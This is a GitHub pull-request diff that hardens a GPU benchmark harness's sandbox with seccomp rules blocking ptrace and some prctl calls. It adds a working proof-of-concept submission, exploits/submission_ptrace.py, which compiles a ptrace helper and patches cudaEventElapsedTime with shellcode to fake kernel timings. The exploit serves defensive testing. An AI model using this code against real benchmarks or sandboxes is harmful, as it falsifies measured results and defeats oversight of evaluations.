Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion .github/workflows/wheel.yml
Original file line number Diff line number Diff line change
Expand Up @@ -39,7 +39,7 @@ jobs:
uses: actions/checkout@v4

- name: Install deps
run: apt update && apt install -y git g++-13
run: apt update && apt install -y git g++-13 libseccomp-dev pkg-config

- name: Install the latest version of uv
uses: astral-sh/setup-uv@v7
Expand Down
5 changes: 4 additions & 1 deletion CMakeLists.txt
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,9 @@ set(CMAKE_CXX_STANDARD 17)
set(CMAKE_CXX_STANDARD_REQUIRED ON)
set(CMAKE_CUDA_ARCHITECTURES "80;90")

find_package(PkgConfig REQUIRED)
pkg_check_modules(LIBSECCOMP REQUIRED IMPORTED_TARGET libseccomp)

Comment thread
ngc92 marked this conversation as resolved.
FetchContent_Declare(
nanobind
QUIET
Expand All @@ -28,7 +31,7 @@ nanobind_add_module(_pygpubench
csrc/landlock.cpp
csrc/obfuscate.cpp
)
target_link_libraries(_pygpubench PUBLIC Python::Module CUDA::cudart)
target_link_libraries(_pygpubench PUBLIC Python::Module CUDA::cudart PkgConfig::LIBSECCOMP)
# set a bunch of hardening options to make it harder to tamper with the executable
target_compile_options(_pygpubench PUBLIC -fPIC -pie -fstack-protector-strong -fcf-protection=full -ftrivial-auto-var-init=zero -Wl,-z,relro,-z,now )
target_compile_definitions(_pygpubench PUBLIC -D_GLIBCXX_ASSERTIONS -D_FORTIFY_SOURCE=3)
Expand Down
78 changes: 66 additions & 12 deletions csrc/landlock.cpp
Original file line number Diff line number Diff line change
Expand Up @@ -16,6 +16,7 @@
#include <sys/syscall.h>
#include <unistd.h>
#include <linux/landlock.h>
#include <seccomp.h>
#include <system_error>
#include <unordered_set>
#include <utility>
Expand Down Expand Up @@ -114,20 +115,10 @@ void install_landlock() {
allow_path(ruleset_fd, "/tmp", RW);
allow_path(ruleset_fd, "/dev", RW); // needed for /dev/null etc, used e.g., by triton

// Prevent ptrace and /proc/self/mem tampering
if (prctl(PR_SET_DUMPABLE, 0) < 0) {
throw std::system_error(errno, std::system_category(), "prctl(PR_SET_DUMPABLE)");
}

// Prevent gaining privileges (if attacker tries setuid exploits)
// required for landlock
if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0) {
throw std::system_error(errno, std::system_category(), "prctl(PR_SET_NO_NEW_PRIVS)");
};
// no new executable code pages
// note: this also prevents thread creating, which breaks torch.compile
// workaround: run torch.compile once from trusted python code, then the thread already
// exists at this point. does not seem reliable, so disabled for now
// prctl(PR_SET_MDWE, PR_MDWE_REFUSE_EXEC_GAIN, 0, 0, 0);

landlock_restrict_self(ruleset_fd, 0);
}
Expand Down Expand Up @@ -192,4 +183,67 @@ void seal_executable_mappings() {
for (auto& r : to_seal) {
mseal(reinterpret_cast<void*>(r.start), r.end - r.start, r.src);
}
}
}

// Converts a libseccomp-style return code into an exception.
// `rc` is treated as a negated errno value when negative; any non-negative value is success.
// `what` becomes the message prefix of the thrown std::system_error.
static inline void check_seccomp(int rc, const char* what) {
    if (rc >= 0) {
        return;
    }
    const std::error_code failure(-rc, std::generic_category());
    throw std::system_error(failure, what);
}

// Adds the deny rules of the sandbox to the seccomp filter context `ctx`.
// Every rule makes the matching syscall fail with EPERM:
//   - ptrace (any arguments)
//   - prctl(PR_SET_DUMPABLE, x) with x != 0
//   - prctl(PR_SET_SECCOMP, ...)
//   - prctl(PR_SET_PTRACER, ...)
// Throws std::system_error (via check_seccomp) if libseccomp rejects a rule.
void setup_seccomp_filter(scmp_filter_ctx ctx) {
    // prctl's `option` parameter is a C `int`: the kernel only looks at the low 32 bits of the
    // argument register, whereas seccomp sees (and SCMP_CMP_EQ compares) the full 64-bit value.
    // An exact 64-bit comparison could thus be sidestepped by issuing the raw syscall with
    // garbage in the upper half, so we match on the low 32 bits only.
    constexpr unsigned long long kIntArgMask = 0xFFFFFFFFULL;

    check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(ptrace), 0),
                  "block ptrace");

    // the second prctl argument is an unsigned long, so a full-width comparison is correct here
    check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(prctl), 2,
                                   SCMP_A0(SCMP_CMP_MASKED_EQ, kIntArgMask, PR_SET_DUMPABLE),
                                   SCMP_A1(SCMP_CMP_NE, 0)),
                  "block prctl(SET_DUMPABLE!=0)");

    check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(prctl), 1,
                                   SCMP_A0(SCMP_CMP_MASKED_EQ, kIntArgMask, PR_SET_SECCOMP)),
                  "block prctl(SET_SECCOMP)");

    check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(prctl), 1,
                                   SCMP_A0(SCMP_CMP_MASKED_EQ, kIntArgMask, PR_SET_PTRACER)),
                  "block prctl(SET_PTRACER)");
    // TODO figure out what else we can and should block
    /*
    check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(mprotect), 1,
                                   SCMP_A2(SCMP_CMP_MASKED_EQ, PROT_WRITE, PROT_WRITE)),
                  "block mprotect+WRITE");

    check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(pkey_mprotect), 1,
                                   SCMP_A2(SCMP_CMP_MASKED_EQ, PROT_WRITE, PROT_WRITE)),
                  "block pkey_mprotect+WRITE");
    */
}

void install_seccomp_filter() {
scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);
if (!ctx) throw std::runtime_error("seccomp_init failed");
try {
setup_seccomp_filter(ctx);
} catch (...) {
seccomp_release(ctx);
throw;
}

// Prevent ptrace and /proc/self/mem tampering
if (prctl(PR_SET_DUMPABLE, 0) < 0) {
throw std::system_error(errno, std::system_category(), "prctl(PR_SET_DUMPABLE)");
}

// Prevent gaining privileges (if attacker tries setuid exploits)
if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0) {
throw std::system_error(errno, std::system_category(), "prctl(PR_SET_NO_NEW_PRIVS)");
};
Comment thread
ngc92 marked this conversation as resolved.
// no new executable code pages
// note: this also prevents thread creating, which breaks torch.compile
// workaround: run torch.compile once from trusted python code, then the thread already
// exists at this point. does not seem reliable, so disabled for now
// prctl(PR_SET_MDWE, PR_MDWE_REFUSE_EXEC_GAIN, 0, 0, 0);

int rc = seccomp_load(ctx);
seccomp_release(ctx);
check_seccomp(rc, "seccomp_load");
}
3 changes: 3 additions & 0 deletions csrc/manager.cpp
Original file line number Diff line number Diff line change
Expand Up @@ -22,6 +22,7 @@ extern void clear_cache(void* dummy_memory, int size, bool discard, cudaStream_t
extern void install_landlock();
extern bool mseal_supported();
extern void seal_executable_mappings();
extern void install_seccomp_filter();

static void check_check_approx_match_dispatch(unsigned* result, void* expected_data, nb::dlpack::dtype expected_type,
const nb_cuda_array& received, float r_tol, float a_tol, unsigned seed, std::size_t n_bytes, cudaStream_t stream) {
Expand Down Expand Up @@ -293,6 +294,8 @@ void BenchmarkManager::do_bench_py(
seal_executable_mappings();
}

install_seccomp_filter();
Comment thread
ngc92 marked this conversation as resolved.

// at this point, we call user code as we import the kernel (executing arbitrary top-level code)
Comment thread
ngc92 marked this conversation as resolved.
// after this, we cannot trust python anymore
nb::callable kernel = kernel_from_qualname(kernel_qualname);
Expand Down
133 changes: 133 additions & 0 deletions exploits/submission_ptrace.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,133 @@
"""
ptrace POKETEXT Exploit
=======================

Forks a child process that uses ptrace(PTRACE_ATTACH) + ptrace(PTRACE_POKETEXT)
to patch cudaEventElapsedTime's .text code. PTRACE_POKETEXT uses FOLL_FORCE
internally, bypassing page protections (read-only .text pages).

"""
import torch
import ctypes
import os
import subprocess
import tempfile

# C source of the helper program that _hook() writes to disk, compiles with gcc and runs.
# The program expects two arguments: the pid to attach to and the address to patch.
# It attaches with PTRACE_ATTACH, waits for the target to stop, overwrites the 9 bytes at
# the address with the shellcode described in the embedded comment (using two 8-byte
# PTRACE_POKETEXT writes, keeping the upper 7 bytes of the second word intact), and detaches.
# Exit codes: 0 on success, 99 for a wrong argument count, 1-5 identify the step that failed.
_HELPER_C = r"""
#define _GNU_SOURCE
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdint.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char** argv) {
if (argc != 3) return 99;
pid_t target = atoi(argv[1]);
uint64_t addr = strtoull(argv[2], NULL, 0);

/* Shellcode: mov dword [rdi], 0x3A83126F; xor eax,eax; ret
Sets *ms = 0.001f (IEEE 754), returns cudaSuccess (0).
Bytes: C7 07 6F 12 83 3A 31 C0 C3 */
uint64_t word1 = 0xC0313A83126F07C7ULL;

if (ptrace(PTRACE_ATTACH, target, NULL, NULL) != 0)
return 1;

int status;
if (waitpid(target, &status, 0) < 0)
return 2;

/* Read original byte at addr+8 to preserve code after our ret */
errno = 0;
uint64_t orig8 = ptrace(PTRACE_PEEKTEXT, target, (void*)(addr + 8), NULL);
if (errno != 0) {
ptrace(PTRACE_DETACH, target, NULL, NULL);
return 3;
}

uint64_t word2 = (orig8 & ~(uint64_t)0xFF) | 0xC3;

if (ptrace(PTRACE_POKETEXT, target, (void*)addr, (void*)word1) != 0) {
ptrace(PTRACE_DETACH, target, NULL, NULL);
return 4;
}

if (ptrace(PTRACE_POKETEXT, target, (void*)(addr + 8), (void*)word2) != 0) {
ptrace(PTRACE_DETACH, target, NULL, NULL);
return 5;
}

ptrace(PTRACE_DETACH, target, NULL, (void*)0);
return 0;
}
"""


def _find_cuda_elapsed():
"""Find cudaEventElapsedTime in the loaded libcudart."""
import ctypes.util
for path in [
ctypes.util.find_library("cudart"),
"libcudart.so",
"libcudart.so.13",
"/usr/local/cuda/lib64/libcudart.so",
]:
if path is None:
continue
try:
lib = ctypes.CDLL(path)
return ctypes.cast(lib.cudaEventElapsedTime, ctypes.c_void_p).value
except Exception:
continue
return None


def _hook():
    """Build and run the ptrace helper against the current process.

    Returns ``True`` only if the symbol address was found, the helper compiled,
    and the helper exited with status 0; otherwise returns ``False``.
    """
    target_addr = _find_cuda_elapsed()
    if target_addr is None:
        return False

    # Compile helper (writes to /tmp which is allowed by landlock)
    workdir = tempfile.mkdtemp()
    source_path = os.path.join(workdir, "ph.c")
    binary_path = os.path.join(workdir, "ph")
    with open(source_path, "w") as source_file:
        source_file.write(_HELPER_C)
    compile_cmd = ["gcc", "-O2", "-o", binary_path, source_path]
    build = subprocess.run(compile_cmd, capture_output=True, text=True)
    if build.returncode != 0:
        return False
    os.chmod(binary_path, 0o755)

    pr_set_dumpable = 4
    pr_set_ptracer = 0x59616d61
    try:
        libc = ctypes.CDLL("libc.so.6")
        # Re-enable dumpable: harness sets PR_SET_DUMPABLE=0 to block ptrace,
        # but there's no seccomp filter preventing us from re-enabling it.
        # PR_SET_NO_NEW_PRIVS does NOT block PR_SET_DUMPABLE.
        libc.prctl(pr_set_dumpable, 1, 0, 0, 0)
        # Allow any process to ptrace us (Yama LSM bypass)
        libc.prctl(pr_set_ptracer, ctypes.c_ulong(0xffffffffffffffff), 0, 0, 0)
    except Exception:
        # best effort: the helper is still attempted even if these calls fail
        pass

    helper_cmd = [binary_path, str(os.getpid()), hex(target_addr)]
    outcome = subprocess.run(helper_cmd, capture_output=True, text=True, timeout=10)
    return outcome.returncode == 0
Comment thread
ngc92 marked this conversation as resolved.
Comment thread
ngc92 marked this conversation as resolved.


# Run the hook once as a module-level side effect, i.e. when this submission is imported;
# the boolean result records whether the helper reported success.
_hooked = _hook()


def kernel(output, inp):
    """Write the weighted sum over the last axis of ``inp`` into ``output``.

    The three weights are 0.2989, 0.5870 and 0.1140. Before the actual reduction,
    a throw-away 2048x2048 float32 matrix product is computed on the same device.
    """
    device = output.device
    coeffs = torch.tensor([0.2989, 0.5870, 0.1140], device=device, dtype=output.dtype)
    # deliberately make the submission very slow, so that we can clearly see
    # whether the cheat was successful
    ballast = torch.empty((2048, 2048), device=device, dtype=torch.float32)
    ballast = torch.matmul(ballast, ballast)
    weighted = inp * coeffs
    torch.sum(weighted, dim=-1, out=output)
Loading